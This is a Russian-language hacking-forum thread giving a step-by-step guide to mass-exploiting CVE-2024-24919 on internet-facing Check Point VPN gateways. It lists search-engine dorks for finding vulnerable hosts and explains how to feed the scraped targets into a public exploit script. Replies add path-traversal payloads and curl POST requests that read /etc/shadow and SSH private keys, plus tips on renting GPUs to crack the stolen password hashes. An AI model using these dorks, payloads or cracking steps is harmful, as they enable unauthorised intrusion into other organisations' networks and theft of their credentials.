• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Уязвимость CVE-2024-24919

k0priz

(L3) cache
Пользователь
Регистрация
23.10.2023
Сообщения
166
Реакции
198
Гарант сделки
4
Такс всем привет, сегодня хочу вам рассказать о
CVE-2024-24919

Что же это за уязвимость?

CVE-2024-24919 — это уязвимость раскрытия информации, которая может позволить злоумышленнику получить доступ к определенной информации на подключенных к Интернету шлюзах, которые настроены с использованием IPSec VPN, VPN удаленного доступа или программного блейда мобильного доступа. Согласно сообщению, Check Point наблюдала эксплуатацию этой уязвимости в реальных условиях, и до сих пор эта деятельность по эксплойту была сосредоточена на устройствах, настроенных с использованием локальных учетных записей и аутентификации только по паролю.



Начнем с того что открываем SHODAN,Fofa или Censys что вам будет удобнее.

Вот дорки для каждой из этих систем:

Shodan Dork: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"
Fofa Dork: app="Check_Point-SSL-Network-Extender"
Censys: risks.name="Vulnerable Check Point Quantum Spark Gateway [CVE-2024-24919]"

Я буду показывать на примере SHODAN

В адресную строку пишем "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"


1.png

Не очень удобно будет копировать все ссылки сделаем проще, если у вас браузер лиса то можете скачать вот такой плагин

3.png


Он поможет сразу сграбить все линки, на страничке шодана нажимаете на него выбираете Extract all Links
и видим такую картину:


4.png


просто копируем все ссылки в .txt файл, далее нам нужен сам сплоит

https://github.com/seed1337/CVE-2024-24919-POC он валяется на гитхабе

пишем:
python3 exploit.py -l /путь/до/файла/ваш.txt

Просто ждем в конце мы увидим примерно такую картину:

2.png


Cобственно все гениальное просто
!

Если вам будет интересно увидеть как из этого делаем доступ, то пишите обезательно сделаю.Всем спасибо.
 
ты не устанешь хешить хеши?

лучше смотреть /.ssh/id-rsa

заменить 18 строку кода
Python:
if payload and payload.startswith("aCSHELL/../../../../../../../etc/shadow"):

сильно не пинать)
 
>> Если вам будет интересно увидеть как из этого делаем доступ, то пишите обезательно сделаю

да, мне интересно. Я напарсил туеву хучу хешей, hashcat брутит такое количество до слёз медленно.
Подскажите где можно арендовать хеш-машину для брута и как вобще зайти по уже сбрученным кредам.
До этого с таким не сталкивался.
 
>> Если вам будет интересно увидеть как из этого делаем доступ, то пишите обезательно сделаю

да, мне интересно. Я напарсил туеву хучу хешей, hashcat брутит такое количество до слёз медленно.
Подскажите где можно арендовать хеш-машину для брута и как вобще зайти по уже сбрученным кредам.
До этого с таким не сталкивался.
immers.cloud
не реклама
видюхи на любой вкус
 
Сообщение для всех тех кто пишет будет ли продолжение.
Продолжение будет, сейчас очень много основной работы и придется подождать немного, кушать тоже на что то хочется
 
Менял на aCSHELL/../../../../../../home/.profile выдает ошибку
Error making request to https://22.22.22.22/clients/MyCRL: ('Connection aborted.', RemoteDisconnected('Remote end closed connection without response'))
Файлы в etc открывает, где есть root, nobody.
Не дает по другим файлам бегать. Мб я что-то не так делаю 🤷‍♀️
ты не устанешь хешить хеши?

лучше смотреть /.ssh/id-rsa

заменить 18 строку кода
Python:
if payload and payload.startswith("aCSHELL/../../../../../../../etc/shadow"):

сильно не пинать
В общем прямым POST запросом дергается, но не все.

Вот такая х.. происходит
└─$ curl -X POST https://1.1.1.1/clients/MyCRL -d "aCSHELL/../../../../../../../etc/os-release" -k
curl: (56) OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 0

└─$ curl -X POST https://1.1.1.1/clients/MyCRL -d "aCSHELL/../../../../../../../etc/issue" -k
curl: (56) OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 0

└─$ curl -X POST https://1.1.1.1/clients/MyCRL -d "aCSHELL/../../../../../../../home/.profile" -k
curl: (56) OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 0

└─$ curl -X POST https://1.1.1.1/clients/MyCRL -d "aCSHELL/../../../../../../../home/admin/.ssh/id_rsa" -k
curl: (56) OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 0
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх